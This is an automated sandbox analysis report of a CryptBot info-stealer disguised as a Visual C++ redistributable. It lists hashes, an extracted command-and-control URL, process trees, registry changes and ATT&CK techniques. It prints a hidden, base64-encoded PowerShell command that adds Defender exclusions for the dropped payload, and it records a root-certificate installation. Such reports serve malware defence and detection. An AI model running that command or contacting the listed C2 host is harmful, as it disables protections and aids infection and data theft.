Analysis
-
max time kernel
147s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
11-02-2025 11:47
Static task
static1
Behavioral task
behavioral1
Sample
a8750b5975e3f52c9285f811e9fe22cf19cc9b097fd96ee945623965c613a385.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
a8750b5975e3f52c9285f811e9fe22cf19cc9b097fd96ee945623965c613a385.exe
Resource
win10v2004-20250207-en
General
-
Target
a8750b5975e3f52c9285f811e9fe22cf19cc9b097fd96ee945623965c613a385.exe
-
Size
5.4MB
-
MD5
7bee3a8f387bbbc84ab90a8a92be6dc6
-
SHA1
d93b5a47af4094bb8d900a8a6feb89bcbf38c118
-
SHA256
a8750b5975e3f52c9285f811e9fe22cf19cc9b097fd96ee945623965c613a385
-
SHA512
95cbe2ed9005342fa1caf3a192f636fd9c8ef64df8f7baaeb09a701c209ef139da90e61a1fd24efef0c4d078706a8acdc082ac7b3f5c138ca5341d6b829846af
-
SSDEEP
98304:ZsskiQvHYE7PyrHXIJ1zqRfm0zWPReVl23hIJyNm4/acqTsg:wiyYaH1q9z6eVlPJygsg
Malware Config
Extracted
cryptbot
http://home.elvnpp11sb.top/PbeokZpPUOamImAhVrmG11
Signatures
-
Cryptbot family
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF VC_redist.x64.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 7612 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 2176 VC_redist.x86.exe 7748 VC_redist.x64.exe 7924 Method.exe -
Loads dropped DLL 6 IoCs
pid Process 2072 a8750b5975e3f52c9285f811e9fe22cf19cc9b097fd96ee945623965c613a385.exe 2072 a8750b5975e3f52c9285f811e9fe22cf19cc9b097fd96ee945623965c613a385.exe 2072 a8750b5975e3f52c9285f811e9fe22cf19cc9b097fd96ee945623965c613a385.exe 2072 a8750b5975e3f52c9285f811e9fe22cf19cc9b097fd96ee945623965c613a385.exe 2072 a8750b5975e3f52c9285f811e9fe22cf19cc9b097fd96ee945623965c613a385.exe 7892 taskeng.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Embeds OpenSSL 1 IoCs
Embeds OpenSSL, may be used to circumvent TLS interception.
resource yara_rule behavioral1/files/0x00090000000174b4-2637.dat embeds_openssl -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a8750b5975e3f52c9285f811e9fe22cf19cc9b097fd96ee945623965c613a385.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VC_redist.x64.exe -
Modifies system certificate store 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Method.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 Method.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 7612 powershell.exe 7748 VC_redist.x64.exe 7748 VC_redist.x64.exe 7748 VC_redist.x64.exe 7748 VC_redist.x64.exe 7748 VC_redist.x64.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe 7924 Method.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2176 VC_redist.x86.exe Token: SeDebugPrivilege 7612 powershell.exe Token: SeDebugPrivilege 7924 Method.exe -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 2072 wrote to memory of 2176 2072 a8750b5975e3f52c9285f811e9fe22cf19cc9b097fd96ee945623965c613a385.exe 30 PID 2072 wrote to memory of 2176 2072 a8750b5975e3f52c9285f811e9fe22cf19cc9b097fd96ee945623965c613a385.exe 30 PID 2072 wrote to memory of 2176 2072 a8750b5975e3f52c9285f811e9fe22cf19cc9b097fd96ee945623965c613a385.exe 30 PID 2072 wrote to memory of 2176 2072 a8750b5975e3f52c9285f811e9fe22cf19cc9b097fd96ee945623965c613a385.exe 30 PID 7580 wrote to memory of 7612 7580 taskeng.exe 35 PID 7580 wrote to memory of 7612 7580 taskeng.exe 35 PID 7580 wrote to memory of 7612 7580 taskeng.exe 35 PID 2072 wrote to memory of 7748 2072 a8750b5975e3f52c9285f811e9fe22cf19cc9b097fd96ee945623965c613a385.exe 37 PID 2072 wrote to memory of 7748 2072 a8750b5975e3f52c9285f811e9fe22cf19cc9b097fd96ee945623965c613a385.exe 37 PID 2072 wrote to memory of 7748 2072 a8750b5975e3f52c9285f811e9fe22cf19cc9b097fd96ee945623965c613a385.exe 37 PID 2072 wrote to memory of 7748 2072 a8750b5975e3f52c9285f811e9fe22cf19cc9b097fd96ee945623965c613a385.exe 37 PID 7892 wrote to memory of 7924 7892 taskeng.exe 39 PID 7892 wrote to memory of 7924 7892 taskeng.exe 39 PID 7892 wrote to memory of 7924 7892 taskeng.exe 39 PID 7924 wrote to memory of 4932 7924 Method.exe 40 PID 7924 wrote to memory of 4932 7924 Method.exe 40 PID 7924 wrote to memory of 4932 7924 Method.exe 40 PID 7924 wrote to memory of 4964 7924 Method.exe 41 PID 7924 wrote to memory of 4964 7924 Method.exe 41 PID 7924 wrote to memory of 4964 7924 Method.exe 41 PID 7924 wrote to memory of 4996 7924 Method.exe 42 PID 7924 wrote to memory of 4996 7924 Method.exe 42 PID 7924 wrote to memory of 4996 7924 Method.exe 42 PID 7924 wrote to memory of 5020 7924 Method.exe 43 PID 7924 wrote to memory of 5020 7924 Method.exe 43 PID 7924 wrote to memory of 5020 7924 Method.exe 43 PID 7924 wrote to memory of 5044 7924 Method.exe 44 PID 7924 wrote to memory of 5044 7924 Method.exe 44 PID 7924 wrote to memory of 5044 7924 Method.exe 44 PID 7924 wrote to memory of 5076 7924 Method.exe 45 PID 7924 wrote to memory of 5076 7924 Method.exe 45 PID 7924 wrote to memory of 5076 7924 Method.exe 45 PID 7924 wrote to memory of 5104 7924 Method.exe 46 PID 7924 wrote to memory of 5104 7924 Method.exe 46 PID 7924 wrote to memory of 5104 7924 Method.exe 46 PID 7924 wrote to memory of 5128 7924 Method.exe 47 PID 7924 wrote to memory of 5128 7924 Method.exe 47 PID 7924 wrote to memory of 5128 7924 Method.exe 47 PID 7924 wrote to memory of 5152 7924 Method.exe 48 PID 7924 wrote to memory of 5152 7924 Method.exe 48 PID 7924 wrote to memory of 5152 7924 Method.exe 48 PID 7924 wrote to memory of 5184 7924 Method.exe 49 PID 7924 wrote to memory of 5184 7924 Method.exe 49 PID 7924 wrote to memory of 5184 7924 Method.exe 49 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\a8750b5975e3f52c9285f811e9fe22cf19cc9b097fd96ee945623965c613a385.exe"C:\Users\Admin\AppData\Local\Temp\a8750b5975e3f52c9285f811e9fe22cf19cc9b097fd96ee945623965c613a385.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x86.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x86.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x64.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\VC_redist.x64.exe"2⤵
- Enumerates VirtualBox registry keys
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7748
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {4EC10FB7-55DE-417F-803D-3A4C00496AC2} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:S4U:1⤵
- Suspicious use of WriteProcessMemory
PID:7580 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAUABlAHIAbQBpAHMAcwBpAG8AbgBTAGUAdABcAE0AZQB0AGgAbwBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAUABlAHIAbQBpAHMAcwBpAG8AbgBTAGUAdABcAE0AZQB0AGgAbwBkAC4AZQB4AGUA2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7612
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {DBAE535A-196D-4FC2-87A1-6184DBDD1A3A} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:7892 -
C:\Users\Admin\AppData\Roaming\PermissionSet\Method.exeC:\Users\Admin\AppData\Roaming\PermissionSet\Method.exe2⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:7924 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe3⤵PID:4932
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe3⤵PID:4964
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe3⤵PID:4996
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe3⤵PID:5020
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe3⤵PID:5044
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe3⤵PID:5076
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe3⤵PID:5104
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe3⤵PID:5128
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe3⤵PID:5152
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe3⤵PID:5184
-
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Modify Registry
1Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8.5MB
MD5f1d1d8dc0494c69f77e03f6b5366a2a4
SHA12f20af746b4e69db58c3c0383365ba9da7c6bf26
SHA25611c9dd0e206ed62d39c85600cda77706e91691b3b6557746a916c0bbe5a60721
SHA512df0c70cb54faef30891da8fb7c8e9e877adbe004ee2348d780131586113d50e3d8ed2966538a69dcdeb5f14f689fb53f913a0747062241813d3b0ad1a064da04
-
Filesize
626KB
MD5abab3febb6ef9c10eb9ecdbebbbc128c
SHA1cda81cd8994098f779de7e1510049daf667fb844
SHA2567614eb6c0d335ac226aec01e855d50c683d9b18529dfc066e51b3163c5f54f3d
SHA512855993982c0660f85ac53defd959f56d912897b5f67afb673dfbf4c1b984abf81ba198ed22553c2aa94f239bcd40e45f7400a7c8c87e79f316f7496cd231db9c